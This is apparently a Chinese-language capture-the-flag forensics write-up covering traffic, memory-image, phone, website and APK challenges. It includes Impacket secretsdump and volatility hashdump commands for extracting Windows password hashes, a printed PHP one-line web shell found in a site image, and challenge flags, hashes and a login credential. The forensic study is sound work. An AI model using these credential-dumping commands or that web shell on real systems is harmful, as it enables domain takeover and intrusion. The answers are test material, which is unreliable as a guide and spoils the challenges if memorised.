DIDCTF-蓝帽杯

domainhacker

打开数据包，先分组查看一下，发现了十个POST一个GET请求，get请求1.rar文件，到处发现有要密码，那就去POST请求流量包里找，发现是蚁剑流量，前面的都没啥使用，在tcp流13使用命令压缩文件，密码是SecretsPassw0rds,文件内容是黑客使用 mimikatz 工具窃取 Windows 系统凭据的操作记录，NTLM就是我们找的敏感数据

flag{416f89c3a5deb1d398a1a1fce93862a7}

domainhacker2

跟第一题差不多，只不过附件直接给了压缩包，依旧是看POST请求数据包

密码是FakePassword123$，然后豆包说ntds.dit包含域内所有用户（包括管理员、服务账号）的哈希值，一旦被窃取，攻击者可通过哈希破解或 Pass-the-Hash 攻击控制整个域环境；那么如何打开又是一个问题

查看文章使用Impacket,我是安装在kali里面，步骤如下

git clone https://github.com/SecureAuthCorp/impacket.git

cd impacket

python setup.py install

本地文件提取 ：用于从 ntds.dit（Windows 活动目录数据库）和 SYSTEM（系统注册表 hive 文件）中提取用户的密码哈希。例如，在获取到这两个文件后，执行命令 python secretsdump.py -system <SYSTEM文件路径> -ntds <ntds.dit文件路径> LOCAL ，即可获取域内用户的 NTLM 哈希等信息 。如果要获取历史密码哈希，可加上 -history 参数

python secretsdump.py -system /home/kali/Desktop/SYSTEM -ntds /home/kali/Desktop/ntds.dit LOCAL -history

flag{07ab403ab740c1540c378b0f5aaa4087}.

手机取证_1

直接在相册里搜图片，分辨率是360×360

手机取证_2

直接搜单号就行

计算机取证_1

这里用volatility，先用imageinfo查看镜像信息，

python2 vol.py -f /home/kali/1.dmp imageinfo

然后用hashdump

python2 vol.py -f /home/kali/1.dmp --Win7SP1x64 hashdump

7f21caca5685f10d9e849cc84c340528 md5解密即可

计算机取证_2

直接看进程就行了

python2 vol.py -f /home/kali/1.dmp --profile=Win7SP1x64 pslist

Magnet RAM Capturer 是一款用于获取计算机物理内存镜像的工具

由于工具限制，计算机取证34就不写了。

程序分析_1

先了解一下程序包名，程序包名是用于唯一标识软件或应用程序的字符串在 Android 开发中，包名设定通常在 androidmanifest.xml 文件中。一般只能包含大写字母（A 到 Z）、小写字母（a 到 z）、数字和下划线，以点（英文句号）分隔，至少包含 2 个断，隔开的每一段都必须以字母开头。为避免冲突，常将域名反转过来作为前缀，如域名是zan.com，包名可以用 com.zan 开头，后面再增加描述产品名称的字符

用jadx反编译一下找到这个.xml文件

程序包名为exec.azj.kny.d.c

程序分析_2

还是在.xml文件里找

minmtta.hemjcbm.ahibyws.MainActivity

程序分析_3

在**MainActivity找到**

aHR0cHM6Ly9hbnNqay5lY3hlaW8ueHl6

程序分析_4

直接搜安全，然后发现类的名称是 a

网站取证_1

这个时候就要火绒上场了，还没解压完就给查出来了

文件内容是

<?php assert(@$_POST['lanmaobei666']); ?>，经典一句话木马，密码是

lanmaobei666

网站取证_2

找到一个加密的php文件，运行一下就知道答案了，要在php7以下才行

<?php
function my_encrypt(){
    $str = 'P3LMJ4uCbkFJ/RarywrCvA==';
    $str = str_replace(array("/r/n", "/r", "/n"), "", $str);
    $key = 'PanGuShi';
    $iv = substr(sha1($key),0,16);
    $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,"",MCRYPT_MODE_CBC,"");
    mcrypt_generic_init($td, "PanGuShi", $iv);
    $decode = base64_decode($str);
    $dencrypted = mdecrypt_generic($td, $decode);
    mcrypt_generic_deinit($td);
    mcrypt_module_close($td);
    $dencrypted = trim($dencrypted);
    return $dencrypted;
}

KELT123

网站取证_3

太难找了，看我才知道有这个文件

WWW\application\admin\controller

jyzg123456

网站取证_4

俺不中嘞，，

答案是 15758353.76

半决赛

手机取证_1

看了好多文章都是盘古石手机取证分析软件，在Lockdown.plist文件里也能找到

iBoot-7429.62.1

手机取证_2

我使用Magnet AXIMO分析的，

我们是东八区，时间加上8小时就行

2022-01-11 18:47:38

这个信息在info.plist也有

后面几题好像没工具就下不了，先放放吧

APK分析_01

这里用DiskGenius挂载磁盘文件，在data文件中发现安装包

我真服了，那1.1MB的安装包也复制不出来，还让买专业版的，万恶的资本家啊！！

这里换了一个软件，7-zip打开，按照这篇文章操作即可

7-Zip电子取证版丨支持打开E01 L01 AFF，还能计算源盘哈希！

导出后，逆向分析一波

0x5f8c8d57

交了才发现这个不对😳，文件里有两个base.apk文件，同样的操作，答案是另一个

APK分析_02

MainActivity中，找到答案

base64解码得到答案

https://ansjk.ecxeio.xyz

答案就是

ansjk.ecxeio.xyzansjk.ecxeio.xyz

APK分析_03

这个jadx我不太会用啊，只能跟着wp一步步复现。还是上一门问那个t，📧查找用例，发现一个函数，这个就是答案

loadUrl

loadUrl

APK分析_04

题目有提示最后以.cn结尾，然后直接搜发现答案

APK分析_05

判断题？？搜索安全得知存在

APK分析_06

还是上图查看使用用例

d.a.a.c.a.b()这个不对，答案是

d.a.a.c.a.a()

APK分析_07

一个一个试发现答案是3，秒了😎。问了我逆向大佬土哥他告诉我看AndroidManifest.xml文件里有几个activity标签就行

如图示3个

APK分析_08

先了解一下什么是ipa

"IPA" 是 iOS 应用程序文件格式的缩写（全称：iOS App Store Package），类似于 Android 系统的 APK 文件，用于在 iOS 设备上安装应用。以下是关于 IPA 的详细介绍：

一、IPA 文件的本质

• 结构 ：IPA 本质是一个 ZIP 压缩包 ，包含应用的可执行文件、资源（图片、音频等）、配置文件（如 Info.plist）、签名信息等。
• 用途：用于 iOS 设备安装应用，可通过 App Store 下载（自动安装），或通过 Xcode、TestFlight、企业证书等方式手动安装（非 App Store 渠道）。

二、IPA 文件的核心组成

将 IPA 文件后缀改为 .zip 解压后，可看到以下关键内容：

1. Payload 文件夹 ：

   核心目录，包含一个以应用名称命名的 .app 文件夹（如 WeChat.app），内部是应用的核心文件：

   • 可执行文件（与应用同名，无后缀）；
   • 资源文件（图片、本地化字符串、界面布局等）；
   • Info.plist：应用配置文件，包含 Bundle ID、版本号、支持的设备等信息；
   • embedded.mobileprovision：签名配置文件，记录证书、权限、有效期等签名信息。

2. iTunesMetadata.plist ：

   包含应用在 App Store 的元数据（如名称、开发者、价格、下载地址等），非 App Store 渠道的 IPA 可能缺失此文件。

3. CodeResources ：

   记录应用内所有文件的哈希值，用于验证文件完整性，防止篡改

在 iOS 开发中，"IPA 包名" 通常指的是 Bundle ID（也称为 "应用唯一标识符"）

这里挂载sdcard.vmdk文件，然后找到ipa文件，把后缀改为zip解压，然后找info.plist文件，找到包名 APK分析_09com.dd666.hongxin

APK分析_09

还是那个文件，搜apikey d395159c291c627c9d4ff9139bf8f0a700b98732

APK分析_10

选择题？？？一个一个试，全部都有，秒了😎。其实是在info.plist都有

APK分析_11

直接搜http就行

www.nansjy.com.cn:8161

APK分析_12

在xml文件中，让ai分析得出程序入口 com.example.weisitas526sad.activity.SplashActivity

APK分析_13

俺又不中lei，由于工具限制这题就不写了

答案是6661

APK分析_14

根据整个题目看来，答案应该是红星。

APK分析_15

这个流量包也是第一次见，.saz 文件是 Fiddler（一款流行的网络抓包工具）专用的数据包存档文件。

还需要安装软件，由于本人比较菜还汉化了一下，参考这篇文章

Fiddler下载和汉化_fiddler汉化-CSDN博客

直接搜login

{"password":"7f07965ec20841305f9e53a7a89584f4","countryCode":"86","sign":"27193c69fbbab5c8445a59568d74241d","userName":"17317289056","nonceStr":"rNDIUIe9v51hVe6OuxP8OUpklkt1zC1F","timestamp":"1641880699013"}

17317289056/b12345678b